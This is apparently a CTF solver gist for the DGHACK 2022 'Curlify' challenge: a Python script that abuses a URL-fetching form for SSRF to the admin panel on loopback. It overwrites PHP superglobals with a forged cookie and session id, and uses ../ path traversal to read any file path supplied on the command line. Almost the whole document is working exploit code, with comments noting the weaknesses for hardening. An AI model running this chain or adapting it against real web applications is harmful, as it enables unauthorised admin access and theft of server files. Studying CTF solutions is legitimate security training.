
@xl00t
Created November 24, 2022 17:12
DGHACK 2022 - Curlify
import requests
import sys
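# Solver for the DGHACK 2022 "Curlify" CTF challenge.
#
# Usage: script.py [absolute/path/on/target]
# With no argument the challenge flag file is requested.
#
# The script chains three requests against the challenge host:
#   1. ask the public URL-fetching form (index.php) to request the admin
#      panel on 127.0.0.1 with a crafted query string, and read a PHPSESSID
#      out of the rendered response;
#   2. use that session to create a task through admin_panel/task.php;
#   3. ask the URL fetcher for the generated task_<id>.txt and print its
#      "Preferences:" field.
#
# NOTE(review): the server-side code is not part of this page, so the
# comments below describe what the requests imply, not confirmed behaviour.
# For anyone hardening a similar application, the chain relies on: a URL
# fetcher that will contact loopback addresses, request parameters that can
# overwrite server-side variables, a language setting used in a file path
# without an allow-list, and task files stored under the web root.

TARGET = "http://curlify3.chall.malicecyber.com"
# Without a timeout a stalled challenge server would hang the script forever.
TIMEOUT = 10


def _between(text, start, end, what):
    """Return the text after the first *start* marker, cut at *end*.

    Exits with a readable message instead of an IndexError when *start*
    is missing, which is what happens whenever a stage of the chain fails
    and the server answers with an unexpected page.
    """
    parts = text.split(start)
    if len(parts) < 2:
        sys.exit(f"error: could not find {what} in the server response")
    return parts[1].split(end)[0]


target_path = "/var/www/html/admin_panel/user_prefs/flag.php"
if len(sys.argv) > 1:
    target_path = sys.argv[1]

headers = {
    "User-Agent": "DGHACK/1.0 (Curlify)"
}

# Stage 1: the URL handed to the fetcher points at the admin panel on the
# loopback interface. The query keys are named after PHP superglobals
# (_POST, _COOKIE, _SERVER, _SESSION); this presumably only has an effect
# because the panel imports request parameters into variable scope.
# DEFAULT_LANGUAGE carries a ../ traversal followed by the wanted file,
# which suggests the value ends up in a file path on the server.
inner_url = (
    "http://127.0.0.1/admin_panel/index.php"
    "?_POST[username]=admin"
    "&_COOKIE[remember_me]=admin7a988e11680f9e151f6f46808690d5ca"
    "&_SERVER[HTTP_ACCEPT_LANGUAGE]=blabla"
    f"&DEFAULT_LANGUAGE=../../../../../../../../{target_path}"
    "&_SESSION[userid]=1"
)
login_page = requests.post(
    f"{TARGET}/index.php",
    data={"url": inner_url},
    headers=headers,
    timeout=TIMEOUT,
).text
# The fetcher echoes the inner response, including its Set-Cookie header.
admin_cookie = _between(login_page, 'PHPSESSID=', ';', "a PHPSESSID cookie")

# Stage 2: create a task with the session obtained above. The server is
# expected to answer "Ticket with id <N> created".
task_fields = {
    "author": "admin",
    "type": "incident",
    "assignee": "admin",
    "description": "aaa"
}
task_page = requests.post(
    f"{TARGET}/admin_panel/task.php",
    data=task_fields,
    cookies={'PHPSESSID': admin_cookie},
    timeout=TIMEOUT,
).text
ticket_id = _between(task_page, 'Ticket with id ', ' created', "the ticket id")

# Stage 3: read the task file back through the URL fetcher.
task_file = requests.post(
    f"{TARGET}/index.php",
    data={"url": f"http://127.0.0.1/admin_panel/tasks/task_{ticket_id}.txt"},
    timeout=TIMEOUT,
).text
if "Preferences:" not in task_file:
    # The original exited silently with status 0 here; report the failure.
    sys.exit("error: the task file has no Preferences field")

rendered = _between(
    task_file,
    '<code class="language-html">HTTP/1.1',
    '</code></pre>\n',
    "the rendered HTTP response",
)
print(_between(rendered, 'Preferences: ', '\n\nAuthor:', "the Preferences value"))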